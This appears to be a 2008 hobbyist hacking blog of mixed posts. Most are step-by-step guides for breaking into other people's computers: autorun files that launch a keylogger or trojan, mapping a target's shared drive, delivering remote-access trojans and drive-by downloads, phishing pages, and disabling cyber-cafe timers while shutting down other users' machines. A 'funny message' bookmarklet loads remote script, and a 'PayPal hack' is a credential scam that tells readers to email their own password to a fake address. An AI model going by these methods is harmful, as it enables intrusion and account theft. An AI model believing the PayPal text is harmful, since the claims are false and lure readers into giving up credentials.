Thursday, September 25, 2008

Magnetic card access the electonic way




Magnetic card lock :- step 1Hardware
Obviously, you first must obtain a magnetic stripe reader. I'm using an Omron V3A-4K that I ordered from digikey. It cost me $20.00 or so. If you can't find one of these, any standard TTL reader will do.

Don't worry about buying one of the fancy harnesses that they sell. There are breakout pads on the circuit board inside of the reader. Once you have received your reader, pop off the side cover, and solder wires to the pads as shown in the picture. Of course, if you have a different reader, the wiring will probably be different. In this case, consult your reader's datasheet to locate the necessary pads.

Next, connect the wires to the Arduino's digital pins as follows:

DATA - 2
CLK - 3
LOAD - 5

Finally, connect the +5v and GND to their respective terminals on the Arduino board.





step 2Software
This step is easy. Simply load the attached sketch on to your Arduino.

Note: I didn't write this code, I found it here. I've just attached it here for convenience.

Arduino_Magstripe_Reader.pde4 KB

Program for the access of the magenatic access card lock

/*
* Magnetic Stripe Reader
* by Stephan King http://www.kingsdesign.com
*
* Reads a magnetic stripe.
*
*/

int cld1Pin = 5; // Card status pin
int rdtPin = 2; // Data pin
int reading = 0; // Reading status
volatile int buffer[400]; // Buffer for data
volatile int i = 0; // Buffer counter
volatile int bit = 0; // global bit
char cardData[40]; // holds card info
int charCount = 0; // counter for info
int DEBUG = 0;

void setup() {
Serial.begin(9600);

// The interrupts are key to reliable
// reading of the clock and data feed
attachInterrupt(0, changeBit, CHANGE);
attachInterrupt(1, writeBit, FALLING);
}

void loop(){

// Active when card present
while(digitalRead(cld1Pin) == LOW){
reading = 1;
}

// Active when read is complete
// Reset the buffer
if(reading == 1) {

if (DEBUG == 1) {
printBuffer();
}

decode();
reading = 0;
i = 0;

int l;
for (l = 0; l < 40; l = l + 1) {
cardData[l] = '\n';
}

charCount = 0;
}
}

// Flips the global bit
void changeBit(){
if (bit == 0) {
bit = 1;
} else {
bit = 0;
}
}

// Writes the bit to the buffer
void writeBit(){
buffer[i] = bit;
i++;
}

// prints the buffer
void printBuffer(){
int j;
for (j = 0; j < 200; j = j + 1) {
Serial.println(buffer[j]);
}
}

int getStartSentinal(){
int j;
int queue[5];
int sentinal = 0;

for (j = 0; j < 400; j = j + 1) {
queue[4] = queue[3];
queue[3] = queue[2];
queue[2] = queue[1];
queue[1] = queue[0];
queue[0] = buffer[j];

if (DEBUG == 1) {
Serial.print(queue[0]);
Serial.print(queue[1]);
Serial.print(queue[2]);
Serial.print(queue[3]);
Serial.println(queue[4]);
}

if (queue[0] == 0 & queue[1] == 1 & queue[2] == 0 & queue[3] == 1 & queue[4] == 1) {
sentinal = j - 4;
break;
}
}

if (DEBUG == 1) {
Serial.print("sentinal:");
Serial.println(sentinal);
Serial.println("");
}

return sentinal;
}

void decode() {
int sentinal = getStartSentinal();
int j;
int i = 0;
int k = 0;
int thisByte[5];

for (j = sentinal; j < 400 - sentinal; j = j + 1) {
thisByte[i] = buffer[j];
i++;
if (i % 5 == 0) {
i = 0;
if (thisByte[0] == 0 & thisByte[1] == 0 & thisByte[2] == 0 & thisByte[3] == 0 & thisByte[4] == 0) {
break;
}
printMyByte(thisByte);
}
}

Serial.print("Stripe_Data:");
for (k = 0; k < charCount; k = k + 1) {
Serial.print(cardData[k]);
}
Serial.println("");

}

void printMyByte(int thisByte[]) {
int i;
for (i = 0; i < 5; i = i + 1) {
if (DEBUG == 1) {
Serial.print(thisByte[i]);
}
}
if (DEBUG == 1) {
Serial.print("\t");
Serial.print(decodeByte(thisByte));
Serial.println("");
}

cardData[charCount] = decodeByte(thisByte);
charCount ++;
}

char decodeByte(int thisByte[]) {
if (thisByte[0] == 0 & thisByte[1] == 0 & thisByte[2] == 0 & thisByte[3] == 0 & thisByte[4] == 1){
return '0';
}
if (thisByte[0] == 1 & thisByte[1] == 0 & thisByte[2] == 0 & thisByte[3] == 0 & thisByte[4] == 0){
return '1';
}

if (thisByte[0] == 0 & thisByte[1] == 1 & thisByte[2] == 0 & thisByte[3] == 0 & thisByte[4] == 0){
return '2';
}

if (thisByte[0] == 1 & thisByte[1] == 1 & thisByte[2] == 0 & thisByte[3] == 0 & thisByte[4] == 1){
return '3';
}

if (thisByte[0] == 0 & thisByte[1] == 0 & thisByte[2] == 1 & thisByte[3] == 0 & thisByte[4] == 0){
return '4';
}

if (thisByte[0] == 1 & thisByte[1] == 0 & thisByte[2] == 1 & thisByte[3] == 0 & thisByte[4] == 1){
return '5';
}

if (thisByte[0] == 0 & thisByte[1] == 1 & thisByte[2] == 1 & thisByte[3] == 0 & thisByte[4] == 1){
return '6';
}

if (thisByte[0] == 1 & thisByte[1] == 1 & thisByte[2] == 1 & thisByte[3] == 0 & thisByte[4] == 0){
return '7';
}

if (thisByte[0] == 0 & thisByte[1] == 0 & thisByte[2] == 0 & thisByte[3] == 1 & thisByte[4] == 0){
return '8';
}

if (thisByte[0] == 1 & thisByte[1] == 0 & thisByte[2] == 0 & thisByte[3] == 1 & thisByte[4] == 1){
return '9';
}

if (thisByte[0] == 0 & thisByte[1] == 1 & thisByte[2] == 0 & thisByte[3] == 1 & thisByte[4] == 1){
return ':';
}

if (thisByte[0] == 1 & thisByte[1] == 1 & thisByte[2] == 0 & thisByte[3] == 1 & thisByte[4] == 0){
return ';';
}

if (thisByte[0] == 0 & thisByte[1] == 0 & thisByte[2] == 1 & thisByte[3] == 1 & thisByte[4] == 1){
return '<';
}

if (thisByte[0] == 1 & thisByte[1] == 0 & thisByte[2] == 1 & thisByte[3] == 1 & thisByte[4] == 0){
return '=';
}

if (thisByte[0] == 0 & thisByte[1] == 1 & thisByte[2] == 1 & thisByte[3] == 1 & thisByte[4] == 0){
return '>';
}

if (thisByte[0] == 1 & thisByte[1] == 1 & thisByte[2] == 1 & thisByte[3] == 1 & thisByte[4] == 1){
return '?';
}
}

step 3Use it!
Finally, simply open the serial connection in the arduino applet, and start swiping cards! The decoded data from the card will appear in the window as soon as you swipe one.

Silica the wifi hacking hardware

HACK ANY COMPUTER VIA SILICA

A. Silica :-It is a device that uses “CANVAS” a software which uses to scan a WI-FI and launches the exploit code itself and connects to the system for the usage it uses a hand held PDA. It uses a immunity tablet of Nokia 770.but it can be customized for a large range of hardware devices. It works on the touch screen Technologies it can be handled in by a stylus. The stylus can launch the silica (hardware device) into the attack and then can be putted into yours pocket. It can run a drive-by-pen test .we can start it run a Scan connect to the WI-FI, run the exploit and get the html report that what is done.

B. Now about the cost Issues:-it makes a large buck to be settled in the Indian market it costs just for Rs 151,200($3,600). The matter will be the cost issues for my Indian Friends. And the company asks for the recognisation of the buyers identity, from where the money is coming in, and to whom and where the product it getting shipping in.

C. Some Example of the Silica Product:-
Tell the silica to scan the every device on every WI-FI networks for file sharing and that downloads anything of the internet to the device. Then just put it in your pocket and walk in to the workplace of your target. A. Silica :-It is a device that uses “CANVAS” a software which uses to scan a WI-FI and launches the exploit code itself and connects to the system for the usage it uses a hand held PDA. It uses a immunity tablet of Nokia 770.but it can be customized for a large range of hardware devices. It works on the touch screen Technologies it can be handled in by a stylus. The stylus can launch the silica (hardware device) into the attack and then can be putted into yours pocket. It can run a drive-by-pen test .we can start it run a Scan connect to the WI-FI, run the exploit and get the html report that what is done.

B. Now about the cost Issues:-it makes a large buck to be settled in the Indian market it costs just for Rs 151,200($3,600). The matter will be the cost issues for my Indian Friends. And the company asks for the recognisation of the buyers identity, from where the money is coming in, and to whom and where the product it getting shipping in.

C. Some Example of the Silica Product:-
Tell the silica to scan the every device on every WI-FI networks for file sharing and that downloads anything of the internet to the device. Then just put it in your pocket and walk in to the workplace of your target.

Tell silica to actively penetrate any machine it can target and have all the machines successfully penetrated machines connect via HTTP/DNS at an external listing port.

Mail silica to the Targets CEO, Then let it turn on and hack anything it can as it sits on the desk

Have the device conduct MITM (Man-in –The-Middle) attacks against the computer connected to wireless network.


Tell silica to actively penetrate any machine it can target and have all the machines successfully penetrated machines connect via HTTP/DNS at an external listing port.

Mail silica to the Targets CEO, Then let it turn on and hack anything it can as it sits on the desk

Have the device conduct MITM (Man-in –The-Middle) attacks against the computer connected to wireless network.

Thursday, August 28, 2008

Making autorun for your Cd..

Making "Autorun" for your CD..
"for educational purposes only!"


Alright, lets say that you have coded a great keylogger or trojan or virus something and you are ready to give it to your friend in a pen drive or a CD.. but you are not sure that your friend would double click on the .exe file.. that is, you're not sure if your friend would execute your code..

now what?

wanna make your code independent? want it to run by itself as soon as the pen drive or CD is inserted in the computer???

if yes then just read this...

1) You open notepad

2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin..( or if nothing happens just double-click on the CD drive in "My Computer")

Tutorials for "Cain and Able"

Tutorial for Using 'Cain and Able'..
[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Image

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

Image

It should begin to scan.

Image

Then IP’s, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.

Image


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.”
This will tell us if the target is online.
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.
The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup

[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”
We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different target.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!

How totrack an ip address

"how can u track that ip address"

----->>>first of all, it might be a dynamic IP address tht keeps changing every time you connect.. only the ISP keeps track of who was logged onto IP at what time..
and
if its a static IP then that person might've used a proxy to send that mail..(hope you know what a proxy does)...

on top of that
he might've used an internet cafe to post you the mail..

AND
ip tracing can atmost give an indication to which city the ip belongs to, not the exact location..

so its not at all simple tracing the ip..

HOWEVER.. here are
Some Visual Tracing Tools

NeoTracePro
http://www.neotrace.com

Visual Route
http://visualroute.visualware.com

e-mailTrackerPro
http://www.visualware.com/personal/download/index.html

Samspade
http://www.samspade.org
"is there any chance to hack through phishing"

yes, there's a lotta chance tricking the victim into entering his login and password in a fake log in page created by you.. this is called phishing.. it is dome as follows:
1. lets say you wanna hack his orkut passwrd.
2. make a webpage which looks like "orkut" but actually is a fake.
3. now the victim would enter his id and pass into it..
4. the fake log in page would save it and later give it to you..

to do this use a software called "Fishing Bait 2.5"

this software would create a fake log in page of any site you want.. and you won't have to code yourself in HTML.. "how to hack some ones password through password dictionary"

There are two types of passwords crackers :
1. dictionary based
2. Brute Forcers

you're talking about the dictionary based password crackers over here, so about using them..
1. goto www.trojanfrance.com
2. get a good password cracker like "john the ripper".
3. use it to crack a password (it would have a pre-made dictionary list of words to try as password)

questions are welcome...

How to break into someone's Email account..

BEWARE!

This info is for educational purpose only. Do not misuse it.

If You Don't Have Physical Access

Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.

To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...

On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).

The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using.
The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.

So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.

Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.

Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...

While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8

View the folder with the same windows

if you're not able to view the folder in same window... goto ""Tools">>"Folder Options">> "Browse Folders" >> check on "open each folder in its own window."..

this should solve your problem..
and about your other problem..

try accessing "taskman" by pressing "crtl+alt+del"... now see the open processes, "kill" any suspicious process.. but be careful and don't kill a system process..

now goto each drive on the comp and don't double click its icon, instead right click and select explore.. now just delete the file "autorun.inf" completely, coz it looks like the Batch file it is calling in your case, is a virus..

questions are always welcome..

If u r not able to open C: or D: drive from ur system

If you're Not able 2 open C: or D: by double click
Sometimes it happens in windows XP that you are not able to open drives on your hard disk. When you double clicking on the drives icons or right click on the drive>>explore in My computer, the drive does not open.

This problem is generally caused by most of the viruses which infect windows XP system. They block or restrict your access to any of the drives.

But don't worry this is not a big trouble it can be fixed easily.

To Fix:

Normally when a virus infects a windows system which causes a drive opening problem, it automatically creates a file named autorun.inf in the root directory of each drive.

This autorun.inf file is a read only ,hidden and a system file and the folder option is also disabled by the virus. This is deliberately done by the virus in order to protect itself. autorun.inf initiates all the activities that the virus performs when you try to open any drive.

You have to just delete this file and restart your system to correct this problem.
Follow the set of commands below to show and delete the autorun.inf

1. Open Start>>Run and type cmd and press enter. This will open a command prompt window. On this command prompt window type the following steps.

2. type cd\

3. type attrib -r -h -s autorun.inf

4. type del autorun.inf

5. now type d: and press enter for d: drive partition. Now repeat steps 3 and 4. Similarly repeat step 5 for all your hard disk partition.

Restart your system and your trouble will be fixed.

Remove a virus from ur Pen Drive

remove the virus from pen drive.. first of all.. delete the file "Autorun.inf" in the pen drive.. and then remove the file containing the virus.. if you wanna know more than tell me what virus, exactly..

Remove a Brontok virus from ur system

How to delete A Virus (like Brontok)
Its the most sticky virus ..
To remove it :

Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor:-

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"

after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-
HKLM\Software\Microsoft\Windows\Currentversion\Run

on the right side delete the entries which contain 'Brontok' and 'Tok-' words.

after that restart ur system
open registry editor and follow the path to enable folder option in tools menu

HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
delete this entry and restart ur computer

and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.

ur computer is completely free from virus brontok!!

HappY HackinG!!!!

Saturday, August 16, 2008

ethical hacking books&tutorials

http://ankit11097.blogspot.com/2007/01/ethical-hacking-tools.html

Hyperlinks in forum

Hello click me
change http://www.orkut.com to desired link
and Hello click me will be displayed
u can change with other text also

BY pass cd key

Bypass XP CD-Key On Install......!
Bypass XP CD-Key On Install


Using a resource hacker you can edit the XP install files to allow you to have the XP CD key inserted by default, save a lot of time if you frequently reinstall windows. You know how annoying it can be to format and type in your CD-KEY. This trick I expect can be done in other versions like Corp. Edition and Home Edition as well but I haven’t tried.

1) First copy all of the XP files from the CD to a folder on your hard drive.
-may also be done by editing an iso / bin file

2) Load up resource hacker and open the file 'winnt32a.dll' in the 'i386' folder.

3) Go to Dialog > 144 > 1033

4) On the dialog select one of the boxes you insert your Valid CD Key into. Then press Ctrl+o to bring up the Control Editor. In the control editor put the 5 letters/numbers of your key into the caption area that corresponds to you your key. Then repeat this for the other boxes.

5) Perform step 4 for dialogs... 'Dialog > 145 > 1033' and 'Dialog > 158 > 1033'

6) Save the *.dll ('File > save')

7) Jam all the install files back onto a new CD.

If you want it bootable, go read another tutorial on the subject
- or edit this file straight from a your iso / bin file of XP
And whenever you want to install XP you will no longer need to supply your CD-KEY
General Newbie helped supply this

Change ur Processor name

Change ur PROCESSORS NAME
Under Windows XP, Click Start, then RUN Command, “regedit“…
(Without the quote symbols)…

Now please navigate your self to this Registry location,

HKEY_LOCAL_MACHINE > HARDWARE > DESCRIPTION > SYSTEM > CENTRAL PROCESSOR >0

Now double click, on the key PROCESSORNAMESTRING . Change as you like…

But be careful and do it on your own risk.

fuuny message

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://helpingbyours.googlepages.com/independence.js';void(0)

Wednesday, August 13, 2008

connect to pc with out any switch and lan

ATTACH 2 PC WITHOUT HUB OR SWITCH
CLIMING RJ45 CONNECTOR CABLE CODE THIS TYPE AND ATTACH 2 PC LAN CARD

FIRST SIDE CLIMPING

ORANGE WHITE
ORANGE
GREENWHITE
GREEN
BLUEWHITE
BLUE
BROWNWHITE
BROWN

SECOND SIDE CLIMPING

GREENWHITE
BLUE
ORANGEWHITE
GREEN
BLUEWHITE
ORANGE
BROWNWHITE
BROWN


ENJOY ...................
ABSOLUTLY WORK 2 PC NETWORKING ANY TYPES OF OPRATING SYSTEM
IF YOU SUCCESS THAT FEED BACK ......

Tuesday, August 5, 2008

Hack a cyber cafe

Basic overview of this tutorial is if there's some kind of timer or client
software on the computer you're using at the Net Cafe you can hopefully disable it.

Firstly we need to gain access to command prompt (cmd.exe) to do this there's a few
ways.

1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.
Say that's disabled then we can try some other methods.

2) Press the Windows Logo + R and it will start run up. (hopefully)

3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.

4) Open notepad type "cmd.exe" without the quotation marks ("") and then
go to File/Save As.. and type the name for the file and have it end with
.bat for example "MyNewFile.bat" and select Save as type and select All Files.

Make sure to save it somewhere you can access it, Like the desktop.

If they have deleted Notepad then go in to Internet Explorer and right click
and select View Source or on the menu bar click View then source and perform the
same process as above.

Once you have done this you can run the file. If you can't open files from the desktop
then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to
the Desktop and it will show the saves files on the desktop in a folder type window.


Once you have access to command prompt you can perform some usefull actions e.g shutdown
programs, shutdown other peoples computers, add new accounts.

Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.



For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.


Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.


Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.



Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in
handy)

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.

PS This wasn't written by me. I'm just sharing it. All due credit goes to the original poster.

Hack a paypal account

1) The following complete hacking tutorial contains materials that may not be suitable for irresponsible internet users, reader discretion is advised!
2) The hacking method is based on a secretly discovered security flaw in the PayPal (www.paypal.com) mailing address confirmation system. It will only work BEFORE PayPal discovers this serious security flaw and fixes it. Take your action FAST!
3) This method works only works for hackers with PayPal accounts with CONFIRMED MAILING ADDRESSES. It will never work for PayPal user without a confirmed mailing address. 4) By strictly following instructions in the following tutorial, you’ll gain unlimited access to various PayPal accounts with confirmed mailing addresses. Use those accounts AT YOUR OWN RISK. You’re responsible for your action!
5) When you use PayPal, NEVER log on to sites that do not start EXACTLY with www.paypal.com even if it contains the term “paypal” in it.
COMPLETE TUTORIAL ON HACKING INTO PAYPAL ACCOUNTS: If your in a hurry skip Down to HACKING PROCESS Since its birth in 1998, eBay owned company PayPal (www.paypal.com) has become a hugely popular internet banking company, as the brand-new idea of sending money to anyone in the world through Email has won hearts of millions of internet users worldwide, the number of members of PayPal has been skyrocketing since. PayPal is now by far the most successful internet banking company. However, insecurity on the internet has been a great problem since the beginning of the boom of the dotcom economy; all famous computers companies have been victims of hackers from around the globe due to security flaws in its system . Microsoft is recent victim of the W32.Blaster.Worm virus which has been identified that could allow an attacker to compromise a computer running Microsoft Windows and gain control over it. Microsoft took immediate action after the spread of the virus, however, a considerable amount of computers worldwide have been victimized and the Blaster Worm is still at large. More information on this security flaw in the Microsoft Windows and the nature of the virus can be found at: http://www.symantec.com/avcenter/venc/data/w32.blaster.worm. html Like Microsoft, PayPal is the latest victim of internet hackers. Despite the company’s seemingly perfect security system, a serious security flaw in the ADDRESS CONFIRMATION PROCESS of PayPal’s members’ accounts has been discovered by a few experienced hackers from Russia.
The hacking process has been simplified a while ago and it was revealed on a Russian language hacking website. PayPal was immediately alerted of this security flaw after the Russian language hacking tutorial was published on the website, but in order to prevent its customers from losing trust in internet banking, PayPal chose NOT to alert its customers of this security flaw and has then secretly BANNED numerous online articles that contained information of this security flaw. However, it has been confirmed that due to technical difficulty, PayPal has NOT yet fixed the problem and at this moment right now, anyone can STILL hack into a great number of PayPal accounts with confirmed addresses.
To inform users worldwide of this problem, I’ve attached an English version of the hacking process. Remember, to get the whole thing to work, you MUST STRICTLY follow the instructions and have a PayPal account with a confirmed mailing address!


HACKING PROCESS: Every PayPal member is identified by his/her Email and the majority of the PayPal members use Yahoo or Hotmail. After completion of the mailing address confirmation process, usually by adding a CREDIT CARD, PayPal automatically sends the user’s address confirmation info to a mailerbot associated with the user’s Email, in most cases, it’s either a Yahoo mailerbot or Hotmail mailerbot. The security flaw occurs RIGHT HERE! Both Yahoo and Hotmail mailerbots can be confused by a random user and sends out information saved on its server to that user.

To get PayPal account information of numerous random PayPal users from a Yahoo or Hotmail mailerbot, you have to do the following:

1) Log into your www.paypal.com homepage, and click on “Profile”, and then click on “Street Address” under “Account Information”.

2) Find the Address whose status is “Home”, and if it says “confirmed”, then please read on. Basically, A Confirmed Address is any address at which you receive your credit card statement. If you receive a credit card bill at this address, you can confirm it by entering your credit card information. This information will only be used to confirm your address. Your card will not be charged by PayPal. So, if your Home address is NOT confirmed, then FOLLOW THE INSTRUCTIONS ON PAYPAL AND ADD A CREDIT CARD TO CONFIRM YOUR MAILING ADDRESS.

3) Okay, There are two bots which this will work for. I. If you want account with Yahoo email, then: Log in to your paypal email account and send an Email to: paypalpass_access@yahoo.com (This is the Yahoo mailerbot described above) In the subject line, write: 0yah3534paypal78verif-0e24 (To confuse the Yahoo mailerbot)
In the email body, please write exactly 11 lines, which MUST BE as follows:
In line 1: Content-Type: text/plain;
In line 2: charset=us-ascii (To make the reply readable)
In line 3: address000%%confirmation0e24.yahoo.com (To confuse the mailerbot)
In line 4: p38ylec00rm::s%%http://www.paypal.com%% (To make the mailerbot start retrieving information acquired from PayPal.)
In line 5: Your primary email at paypal then coma then the password of this e mail account (To retrieve information from PayPal, The mailerbot now needs an Email which is the primary Email of a PayPal account with a confirmed mailing address, you have to use your own Email as a bait Email and you’ll need to receive info of other accounts from this Email too, so be sure this is your primary Email at PayPal.)
In line 6: start (retrieve > 0) (To activate the mailerbot’s retrieval function)
In line 7: verified (*value= = float) (To continue the mailerbot’s retrieval function)
In line 8: Your PayPal password (Now you have to enter your paypal password, as the yahoo mailerbot was programmed in a way that it sends testing info to PayPal who’ll verify each account’s password and confirm it with the Yahoo mailerbot. So in line 8, you have to enter your valid/correct password of your PayPal account.)
In line 9: #searchmsgend72hr (To search for info of PayPal members who had their addresses confirmed in the last 72 hours)
In line 10 send&&idR20034-tsa-0583 (This will make the mailerbot send all the info to your email)
In line 11 #endofmsg (Last step!) Note: Please STRICTLY follow the instruction above and you’ll be guaranteed to get an automatic reply from the confused Yahoo mailerbot! Then you’ll have email, password and all sorts of information of PayPal users who had their mailing addresses confirmed over the last 72 hours.

II.If you want account with hotmail email. Log into your paypal email account and send an Email to: paypalpass_access@hotmail.com (This is the hotmail mailerbot that deals with PayPal hotmail registration) The hotmail mailerbot was programmed in a very similar way to the yahoo one, however, they’re NOT the same. So you have to strictly follow the instructions below to get it to work.
In the subject line, write: 8hot34mail%%tqui3-paypal-35fe2 (This is how you confuse the Hotmail mailerbot)
